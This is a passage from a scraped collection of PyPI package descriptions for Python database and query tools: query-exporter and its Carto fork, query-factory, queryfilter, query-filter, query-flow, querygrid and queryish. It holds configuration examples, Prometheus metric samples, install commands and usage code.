1.0\n# HELP queries_created Number of database queries\n# TYPE queries_created gauge\nqueries_created{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\",status=\"success\"} 1.5945442444463024e+09\nqueries_created{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\",status=\"success\"} 1.5945442444471517e+09\nqueries_created{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\",status=\"success\"} 1.5945442444477117e+09\nqueries_created{app=\"app1\",database=\"db2\",query=\"query3\",region=\"us2\",status=\"error\"} 1.5945444000140696e+09\n# HELP query_latency Query execution latency\n# TYPE query_latency histogram\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.005\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.01\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.025\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.05\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.075\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.1\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.25\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.75\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"1.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"2.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"5.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"7.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_count{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_sum{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 0.004666365042794496\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.005\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.01\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.025\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.05\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.075\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.1\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.25\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.75\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"1.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"2.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"5.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"7.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"10.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"+Inf\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_count{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_sum{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 0.012369773990940303\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.005\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.01\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.025\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.05\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.075\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.1\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.25\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.75\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"1.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"2.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"5.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"7.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_count{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_sum{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 0.004745393933262676\n# HELP query_latency_created Query execution latency\n# TYPE query_latency_created gauge\nquery_latency_created{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 1.594544244446163e+09\nquery_latency_created{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 1.5945442444470239e+09\nquery_latency_created{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 1.594544244447551e+09\n# HELP query_timestamp Query last execution timestamp\n# TYPE query_timestamp gauge\nquery_timestamp{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 1.594544244446199e+09\nquery_timestamp{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 1.594544244452181e+09\nquery_timestamp{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 1.594544244481839e+09\n# HELP metric1 A sample gauge\n# TYPE metric1 gauge\nmetric1{app=\"app1\",database=\"db1\",region=\"us1\"} -3561.0\n# HELP metric2 A sample summary\n# TYPE metric2 summary\nmetric2_count{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 13.0\nmetric2_sum{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 58504.0\nmetric2_count{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 13.0\nmetric2_sum{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 75262.0\n# HELP metric2_created A sample summary\n# TYPE metric2_created gauge\nmetric2_created{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 1.594544244446819e+09\nmetric2_created{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 1.594544244447339e+09\n# HELP metric3 A sample histogram\n# TYPE metric3 histogram\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"10.0\",region=\"us2\"} 1.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"20.0\",region=\"us2\"} 1.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"50.0\",region=\"us2\"} 2.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"100.0\",region=\"us2\"} 3.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"1000.0\",region=\"us2\"} 13.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"+Inf\",region=\"us2\"} 13.0\nmetric3_count{app=\"app1\",database=\"db2\",region=\"us2\"} 13.0\nmetric3_sum{app=\"app1\",database=\"db2\",region=\"us2\"} 5016.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"20.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"50.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"100.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"1000.0\",region=\"us1\"} 13.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",region=\"us1\"} 13.0\nmetric3_count{app=\"app1\",database=\"db1\",region=\"us1\"} 13.0\nmetric3_sum{app=\"app1\",database=\"db1\",region=\"us1\"} 5358.0\n# HELP metric3_created A sample histogram\n# TYPE metric3_created gauge\nmetric3_created{app=\"app1\",database=\"db2\",region=\"us2\"} 1.5945442444469101e+09\nmetric3_created{app=\"app1\",database=\"db1\",region=\"us1\"} 1.5945442444474254e+09\n# HELP metric4 A sample enum\n# TYPE metric4 gauge\nmetric4{app=\"app1\",database=\"db2\",metric4=\"foo\",region=\"us2\"} 0.0\nmetric4{app=\"app1\",database=\"db2\",metric4=\"bar\",region=\"us2\"} 0.0\nmetric4{app=\"app1\",database=\"db2\",metric4=\"baz\",region=\"us2\"} 1.0Builtin metricsThe exporter provides a few builtin metrics which can be useful to track query execution:database_errors{database=\"db\"}:a counter used to report number of errors, per database.queries{database=\"db\",query=\"q\",status=\"[success|error|timeout]\"}:a counter with number of executed queries, per database, query and status.query_latency{database=\"db\",query=\"q\"}:a histogram with query latencies, per database and query.query_timestamp{database=\"db\",query=\"q\"}:a gauge with query last execution timestamps, per database and query.In addition, metrics for resources usage for the exporter process can be\nincluded by passing--process-statsin the command line.Debugging / LogsYou can enable extended logging using the-Lcommandline switch. Possible\nlog levels areCRITICAL,ERROR,WARNING,INFO,DEBUG.Database enginesSQLAlchemydoesn\u2019t depend on specific Python database modules at\ninstallation. This means additional modules might need to be installed for\nengines in use. These can be installed as follows:pip install SQLAlchemy[postgresql] SQLAlchemy[mysql] ...based on which database engines are needed.Seesupported databasesfor details.Install from Snapquery-exportercan be installed fromSnap Storeon systems where Snaps\nare supported, via:sudo snap install query-exporterThe snap provides both thequery-exportercommand and a daemon instance of\nthe command, managed via a Systemd service.To configure the daemon:create or edit/var/snap/query-exporter/current/config.yamlwith the\nconfigurationrunsudo snap restartquery-exporterThe snap has support for connecting the following databases:PostgreSQL (postgresql://)MySQL (mysql://)SQLite (sqlite://)Microsoft SQL Server (mssql://)IBM DB2 (db2://) on supported architectures (x86_64, ppc64le and\ns390x)Run in Dockerquery-exportercan be run insideDockercontainers, and is available from\ntheDocker Hub:docker run --rm -it -p 9560:9560/tcp -v \"$CONFIG_DIR:/config\" adonato/query-exporter:latestwhere$CONFIG_DIRis the absolute path of a directory containing aconfig.yamlfile, the configuration file to use. Alternatively, a volume\nname can be specified.A different ODBC driver version to use can be specified during image building,\nby passing--build-argODBC_bVERSION_NUMBER, e.g.:docker build . --build-arg ODBC_DRIVER_VERSION=17The image has support for connecting the following databases:PostgreSQL (postgresql://)MySQL (mysql://)SQLite (sqlite://)Microsoft SQL Server (mssql://)IBM DB2 (db2://)Oracle (oracle://)ClickHouse (clickhouse+native://)AHelm chartto run the container in Kubernetes is also available."} +{"package": "query-exporter-carto", "pacakge-description": "query-exporteris aPrometheusexporter which allows collecting metrics\nfrom database queries, at specified time intervals.It usesSQLAlchemyto connect to different database engines, including\nPostgreSQL, MySQL, Oracle and Microsoft SQL Server.Each query can be run on multiple databases, and update multiple metrics.The application is called with a configuration file that looks like this:databases:db1:dsn:sqlite://db2:dsn:sqlite://metrics:metric1:type:gaugedescription:A sample gaugemetric2:type:summarydescription:A sample summarymetric3:type:histogramdescription:A sample histogrambuckets:[10,20,50,100,1000]metric4:type:enumdescription:A sample enumstates:[foo,bar,baz]queries:query1:interval:5databases:[db1]metrics:[metric1]sql:SELECT random() / 1000000000000000query2:interval:20databases:[db1,db2]metrics:[metric2,metric3]sql:|SELECT abs(random() / 1000000000000000),abs(random() / 10000000000000000)query3:interval:10databases:[db2]metrics:[metric4]sql:|SELECT value FROM (SELECT 'foo' AS value UNIONSELECT 'bar'UNION SELECT 'baz')ORDER BY random()LIMIT 1Thedsnconnection string has the following format:dialect[+driver]://[username:password][@host:port]/database(seeSQLAlchemy documentationfor details on the available options).Themetricslist in the query configuration must match values returned by\nthe query defined insql.Theintervalvalue is interpreted as seconds if no suffix is specified;\nvalid suffix ares,m,h,d. Only integer values can be\nspecified. If no value is specified (or specified asnull), the query is\nexecuted at every HTTP request.Queries will usually return a single row, but multiple rows are supported, and\neach row will cause an update of the related metrics. This is relevant for any\nkind of metric except gauges, which will be effectively updated to the value\nfrom the last row.For the configuration above, exported metrics look like this:# HELP metric1 A sample gauge\n# TYPE metric1 gauge\nmetric1{database=\"db1\"} 1549.0\n# HELP metric2 A sample summary\n# TYPE metric2 summary\nmetric2_count{database=\"db2\"} 1.0\nmetric2_sum{database=\"db2\"} 5229.0\nmetric2_count{database=\"db1\"} 1.0\nmetric2_sum{database=\"db1\"} 4513.0\n# TYPE metric2_created gauge\nmetric2_created{database=\"db2\"} 1.5456472955657206e+09\nmetric2_created{database=\"db1\"} 1.5456472955663064e+09\n# HELP metric3 A sample histogram\n# TYPE metric3 histogram\nmetric3_bucket{database=\"db2\",le=\"10.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"20.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"50.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"100.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"1000.0\"} 1.0\nmetric3_bucket{database=\"db2\",le=\"+Inf\"} 1.0\nmetric3_count{database=\"db2\"} 1.0\nmetric3_sum{database=\"db2\"} 714.0\nmetric3_bucket{database=\"db1\",le=\"10.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"20.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"50.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"100.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"1000.0\"} 1.0\nmetric3_bucket{database=\"db1\",le=\"+Inf\"} 1.0\nmetric3_count{database=\"db1\"} 1.0\nmetric3_sum{database=\"db1\"} 602.0\n# TYPE metric3_created gauge\nmetric3_created{database=\"db2\"} 1.545647295565831e+09\nmetric3_created{database=\"db1\"} 1.5456472955663848e+09\n# HELP metric4 A sample enum\n# TYPE metric4 gauge\nmetric4{database=\"db2\",metric4=\"foo\"} 0.0\nmetric4{database=\"db2\",metric4=\"bar\"} 1.0\nmetric4{database=\"db2\",metric4=\"baz\"} 0.0Metrics are automatically tagged with thedatabaselabel so that\nindipendent series are generated for each database.Database enginesSQLAlchemy doesn\u2019t depend on specific Python database modules at\ninstallation. This means additional modules might need to be installed for\nengines in use, as follows:pip install SQLAlchemy[postgresql] SQLAlchemy[mysql] ...based on which databased is in use.Seesupported databasesfor details.Carto extensionYou can define a carto connection instead of a SQL DSN. If you want to do so, use acarto:entry in your database.Example:databases:\n test_carto:\n carto:\n user: my_carto_user\n api_key: my_carto_api_key\n\nmetrics:\n observations_simple_count:\n type: gauge\n description: Simple count to check if this works...\n\nqueries:\n query_count_simple_count:\n interval: 120s\n databases: [test_carto]\n metrics: [observations_simple_count]\n sql: SELECT count(*) from county_population;You cannot use bothdsnandcartoentries in the same database as that makes no sense.The available fields for the configuration object are the same as for the Longitude CartoDataSource objects.As of today, such fields are (keep in mind that some might not make sense for monitoring):api_version:v2by defaultuses_batch:Falseby defaulton_premise_domain:''by default. If provided, the Carto URL will use it. If not, the default user URL will.api_key:''by default. Mandatory. Master api key recommended.user:''by default. Mandatory. CARTO user (not email)cache: Empty by default. Cache configuration. Useless in this context for now.Development environmentThe easiest way to install the required dependencies is to create a virtual environment and install the package:python setup.py install\npipenv install -e ."} +{"package": "query-factory", "pacakge-description": "QUERY FACTORYThis tool should help organizing SQL queries into python projects.USAGEYou should seperate query template in a yaml file as in the following example:# template.yamldescription:|This is a simple query for demonstration purpose.variables:start_date:description:UTC datetime string to gather data from (inclusive)required:trueend_date:description:UTC datetime string to gather data to (exclusive)required:truecategory_id:description:Category id to filter on. If null, filter won't apply.required:falsedefault:nullmarket:description:Market scope (either 'pro' or 'part').required:falsedefault:partquery_template:|SELECT *FROM db.tableWHERE event_date >= {{ start_date }}AND event_date < {{ end_date }}AND market = {{ market }}{% if category_id %}AND category_id = {{ category_id }}{% endif %}LIMIT = 100;Then get your factory up and run some queries:fromquery_factoryimportSQLQueryFactory# factory setup.factory=SQLQueryFactory(\"/path/to/template.yaml\")Factory carries some information about template as:>>>set(factory.required_variables){'end_date','start_date'}>>>set(factory.optional_variables){'category_id'}>>>factory.describe(\"start_date\")'UTC datetime string to gather data from (inclusive)'Here is how you can variabilize your queries using a factory as define above:importpandasaspdconnection=connect_to_sql_query_engine()data_2020_02_01=pd.read_sql(factory(start_date=\"2020-02-01\",end_date=\"2020-02-02\"),con=connection)data_2020_02_02_filtered_on_categ1=pd.read_sql(factory(start_date=\"2020-02-02\",end_date=\"2020-02-03\",category_id=\"categ_1\"),con=connection)"} +{"package": "queryfilter", "pacakge-description": "FeatureAllow same query interface to be shared between Django ORM, SQLAlchemy, and GraphQL backend.Documenthttps://github.com/iCHEF/queryfilter/wikiInstallationpip install queryfilterDevelopmentgit clone https://github.com/iCHEF/queryfilter.git\ncd queryfilter\npip install -e .[dev]TestsThis project usespytestto run tests."} +{"package": "query-filter", "pacakge-description": "python-query-filterThis package provides a function-based API for filtering collections of\nheterogeneous, nested dictionaries or complex objects. It has 100% test\ncoverage.At the core of the API is theq_filterfunction, which is like\nthe built-infilterfunction, but take any number of predicate functions\nrather than just one.The remainder of the functions in this package\nare used to construct predicates that evaluate items\nor attributes within filtered objects.Inspired by the more class-basedQueryableList.Use CaseThis package is best suited to nested, heterogeneous data that\none might find in a serialised HTTP response body.Installpipinstallquery-filterExamplesFiltering by list/dictionary itemsIn the next few examples, we'll be filtering a typical response fromboto3,\nthe python client for Amazon Web Services.If we want to get data that haveAssociatePublicIpAddressset toTrue, we can do the following:>>>fromquery_filterimportq_filter,q>>>results=q_filter(versions_data[\"LaunchTemplateVersions\"],q[\"LaunchTemplateData\"][\"NetworkInterfaces\"][0][\"AssociatePublicIpAddress\"])>>>results>>>list(results)[{'CreateTime':datetime.datetime(2017,11,20,12,52,33),'DefaultVersion':True,'LaunchTemplateData':{'ImageId':'ami-aabbcc11','KeyName':'kp-us-east','NetworkInterfaces':[{'AssociatePublicIpAddress':True,'DeleteOnTermination':False,'DeviceIndex':0,'Groups':['sg-7c227019'],'SubnetId':'subnet-7b16de0c','PrivateIpAddress':'80.141.44.12'}],'UserData':''},'CreditSpecification':{'CpuCredits':'standard'},'CpuOptions':{'CoreCount':1,'ThreadsPerCore':2},'LaunchTemplateId':'lt-068f72b72934aff71','VersionNumber':1}]The filter above doesn't use== Truebut rather checks\nthe truthiness of the\"AssociatePublicIpAddress\"key's value.The equivalent generator expression for a simple query likes this\nis less readable.>>>fromtypingimportCollection>>>results=(versionforversioninversions_data[\"LaunchTemplateVersions\"]ifversion.get(\"LaunchTemplateData\",{}).get(\"NetworkInterfaces\")andisinstance(version[\"LaunchTemplateData\"][\"NetworkInterfaces\"],Collection)andversion[\"LaunchTemplateData\"][\"NetworkInterfaces\"][0].get(\"AssociatePublicIpAddress\"))This example is excessively defensive, but hopefully it explains the motivation\nbehind this tool.Agetcall is needed in the generator expression above because the item\"AssociatePublicIpAddress\"is sometimes missing.\nThe first two conditions aren't strictly needed to filter the example data.\nHowever, they do illustrate the fact thatq_itempredicates silently\nreturnFalseif\"LaunchTemplateData\"is not present, or\nif\"NetworkInterfaces\"is missing, is not a collection\nor is an empty collection.Filtering using custom predicatesWe can combine custom queries with those created with the help\nof this package. The following predicate can be used to ensure\nthat the launch template versions specify a sufficient number of\nthreads.defthreads_gte(min_threads:int):defpred(version:dict):cores=version[\"CpuOptions\"][\"CoreCount\"]threads=version[\"CpuOptions\"][\"ThreadsPerCore\"]returncores*threads>=min_threadsreturnpredHere we're usingq_any, which combines the predicates passed into it,\nreturningTrueif at least one of them is satisfied.>>>fromquery_filterimportq,q_any,q_filter>>>results=q_filter(versions_data[\"LaunchTemplateVersions\"],q_any(threads_gte(5),q[\"CreditSpecification\"][\"CpuCredits\"]==\"unlimited\"))>>>list(results)[{'CreateTime':datetime.datetime(2017,11,20,15,45,33),'DefaultVersion':False,'LaunchTemplateData':{'ImageId':'ami-cc3e8abf','KeyName':'kp-us-east','NetworkInterfaces':[{'DeviceIndex':0,'Groups':['sg-7c227019'],'SubnetId':'subnet-a4579fe6','Ipv6Addresses':[{'Ipv6Address':'4f08:ea60:17f9:3e89:4d66:2e8c:259c:d1a9'},{'Ipv6Address':'b635:26ad:8fdf:a274:88dc:cf8c:47df:26b7'},{'Ipv6Address':'eb7a:5a31:f899:dd8c:e566:3307:a45e:dcf6'}],'Ipv6AddressCount':3,'PrivateIpAddress':'80.141.152.14'}]},'CpuOptions':{'CoreCount':4,'ThreadsPerCore':1},'CreditSpecification':{'CpuCredits':'unlimited'},'LaunchTemplateId':'lt-aaa68831cce2a8d91','VersionNumber':4},{'CreateTime':datetime.datetime(2017,11,20,19,4,54),'DefaultVersion':False,'LaunchTemplateData':{'ImageId':'ami-2f7ac02a','KeyName':'kp-us-east','NetworkInterfaces':[{'DeviceIndex':0,'Groups':['sg-1c628b25'],'SubnetId':'subnet-a4579fe6','Ipv6Addresses':[{'Ipv6Address':'f486:915c:2be9:b0da:7d60:3fae:d65a:e8d8'},{'Ipv6Address':'eb7a:5a31:f899:dd8c:e566:3307:a45e:dcf6'}],'Ipv6AddressCount':2,'PrivateIpAddress':'80.141.152.136'}]},'CpuOptions':{'CoreCount':3,'ThreadsPerCore':2},'CreditSpecification':{'CpuCredits':'standard'},'LaunchTemplateId':'lt-aaa68831cce2a8d91','VersionNumber':5}]Filtering by object attributesThis can be useful if you're working with objects that have a lot\nof \"has-a\" relationships to other objects. For brevity,\na hacky binary tree-like class is used to build a fictional ancestor chart.>>>classNode:instances=[]def__init__(self,name,mother=None,father=None):self.name=nameself.mother=motherself.father=fatherself.instances.append(self)def__repr__(self):return(f\"Node('{self.name}', mother={repr(self.mother)}, \"f\"father={repr(self.father)})\")>>>Node(name='Tiya Meadows',mother=Node('Isobel Meadows (nee Walsh)',mother=Node(name='Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)'),father=Node('Alan Eastwood')),father=Node(name='Jimmy Walsh')),father=Node(name='Isaac Meadows',mother=Node('Halle Meadows (nee Perkins)'),father=Node('Wilbur Meadows')))To demonstrate the syntax, we can filter for the root node by their\ngreat-great-grandmother.>>>fromquery_filterimportq,q_contains,q_filter>>>results=q_filter(Node.instances,q_contains(q.mother.mother.mother.name,\"Opal Eastwood\"))>>>list(results)[Node('Tiya Meadows',mother=Node('Isobel Meadows (nee Walsh)',mother=Node('Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)',mother=None,father=None),father=Node('Alan Eastwood',mother=None,father=None)),father=Node('Jimmy Walsh',mother=None,father=None)),father=Node('Isaac Meadows',mother=Node('Halle Meadows (nee Perkins)',mother=None,father=None),father=Node('Wilbur Meadows',mother=None,father=None)))]q_containsabove is the equivalent of the expression:\"Opal Eastwood\" in Node.instances.mother.mother.mother.name.\nIt is one of several functions that enable us to create queries\nbased on operators that cannot be overloaded in the same way\nas the comparison operators.Here is another example:>>>fromquery_filterimportq,q_is_not,q_matches_regex,q_filter>>>results=q_filter(Node.instances,q_matches_regex(q.name,r\"Walsh(?! \\(nee)\"),q_is_not(q.father,None))>>>list(results)[Node('Isobel Meadows (nee Walsh)',mother=Node('Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)',mother=None,father=None),father=Node('Alan Eastwood',mother=None,father=None)),father=Node('Jimmy Walsh',mother=None,father=None))]APIFilter functionsquery_filter.q_filterThis is an alias forquery_filter.q_filter_all.query_filter.q_filter_all(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which all of the predicates inpredsare true.query_filter.q_filter_any(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which any of the predicates inpredsare true.query_filter.q_filter_not_any(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which none of the predicates inpredsis true.Predicate functionsquery_filter.q_all(*preds: Callable) -> CallableReturns a predicate that returnsTrueif all predicates\ninpredsreturnTrue.query_filter.q_any(*preds: Callable) -> CallableReturns a predicate that returnsTrueif any predicates\ninpredsreturnTrue.query_filter.q_not(pred: Callable) -> CallableReturns a predicate that returnsTrueif the predicatepredreturnsFalse.Building QueriesTheQueryclass, an instance of which is always imported asqis used to specify attribute and item access.It provides a way of specifying lookups on objects. For instance,\nthis would could be used to filter for orders created in May:>>>results=q_filter(orders,q.metadata['date_created'].month==5)The class supports some operators which offer the most convenient API\nfor building queries.Comparison OperatorsTheQueryclass supports all six comparison operators:<,<=,==,!=,>and>=.Bitwise OperatorsThe bitwise not operator~negates the truthiness of theQueryobject.For exampleq.is_activewill produce a predicate that returnsTrueif\nan object has an attributes namedis_activeand that attribute's value\nis truthy.~q.is_activewill produce the opposite result.FunctionsThere are some useful operators such asisthat cannot be overloaded.\nMost of the functions below replace these.query_filter.q_is_in(query: Query, container: Container) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is in thecontainerargument.query_filter.q_contains(query: Query, member: Any) -> Callable[[Container], bool]Returns a predicate that's true if the queried object contains thememberargument.query_filter.q_is(query: Query, criterion: Any) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is identical\nto the criterion object.query_filter.q_is_not(query, criterion: Any) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is not identical\nto the criterion object.query_filter.q_matches_regex(query: Query, pattern: str | bytes) -> [[str | bytes], bool]This function may be convenient when working with strings and byte strings.\nIt returns a predicate that's true if the queried object matches the regular expressionpatternargument.TestsIf you want to run tests, you'll first need to install the package\nfrom source and make it editable. Ensuring that you're in the root directory\nof this repo, enter:pipinstall-e.\npipinstall-rrequirements/development.txt\npytestTo run tests with coverage:coveragerun--source\"query_filter\"-mpytesttests\ncoveragereportFeature ideasQuery all items in an iterable rather than just one using...Build queries out ofQueryobjects using the&and|operatorsMake silent failure when retrieving attributes and items optional"} +{"package": "query-flow", "pacakge-description": "QueryFlowQueryFlow, is a query visualization tool that provides insights into common problems in your SQL query.\nQueryFlow visualizes the query execution using the Sankey diagram, a technique that allows one to illustrate complex processes, with a focus on a single aspect or resource that you want to highlight.\nThis allow to tackle the following problems:Identifying missing records.Identifying Ineffective operations.Identifying duplications in a query.Comparing optimizer planned metrics to actual metrics.Identifying performance bottlenecks in a single query.Identifying performance bottlenecks in multiple queries.Currently QueryFlow support the following databases/data-engines:AthenaPostgreSQLDocumentation:https://eyaltrabelsi.github.io/query-flowGitHub:https://github.com/eyaltrabelsi/query-flowPyPI:https://pypi.org/project/query-flow/Free software: MITInstallingThe best way to install query-flow is:$ pip install query-flowIn case you want to use another way go to theinstallation page."} +{"package": "querygrid", "pacakge-description": "No description available on PyPI."} +{"package": "queryish", "pacakge-description": "queryishA Python library for constructing queries on arbitrary data sources following Django's QuerySet API.MotivationDjango's QuerySet API is a powerful tool for constructing queries on a database. It allows you to compose queries incrementally, with the query only being executed when the results are needed:books=Book.objects.all()python_books=books.filter(topic='python')latest_python_books=python_books.order_by('-publication_date')[:5]print(latest_python_books)# Query is executed hereThis pattern is a good fit for building web interfaces for listing data, as it allows filtering, ordering and pagination to be handled as separate steps.We may often be required to implement similar interfaces for data taken from sources other than a database, such as a REST API or a search engine. In these cases, we would like to have a similarly rich API for constructing queries to these data sources. Even better would be to follow the QuerySet API as closely as possible, so that we can take advantage of ready-made tools such asDjango's generic class-based viewsthat are designed to work with this API.queryishis a library for building wrappers around data sources that replicate the QuerySet API, allowing you to work with the data in the same way that you would with querysets and models.InstallationInstall using pip:pipinstallqueryishUsage - REST APIsqueryishprovides a base classqueryish.rest.APIModelfor wrapping REST APIs. By default, this follows the out-of-the-box structure served byDjango REST Framework, but various options are available to customise this.fromqueryish.restimportAPIModelclassParty(APIModel):classMeta:base_url=\"https://demozoo.org/api/v1/parties/\"fields=[\"id\",\"name\",\"start_date\",\"end_date\",\"location\",\"country_code\"]pagination_style=\"page-number\"page_size=100def__str__(self):returnself.nameThe resulting class has anobjectsproperty that supports the usual filtering, ordering and slicing operations familiar from Django's QuerySet API, although these may be limited by the capabilities of the REST API being accessed.>>>Party.objects.count()4623>>>Party.objects.filter(country_code=\"GB\")[:10],,,,,,,,,]>>>>Party.objects.get(name=\"Nova 2023\")Methods supported includeall,count,filter,order_by,get,first, 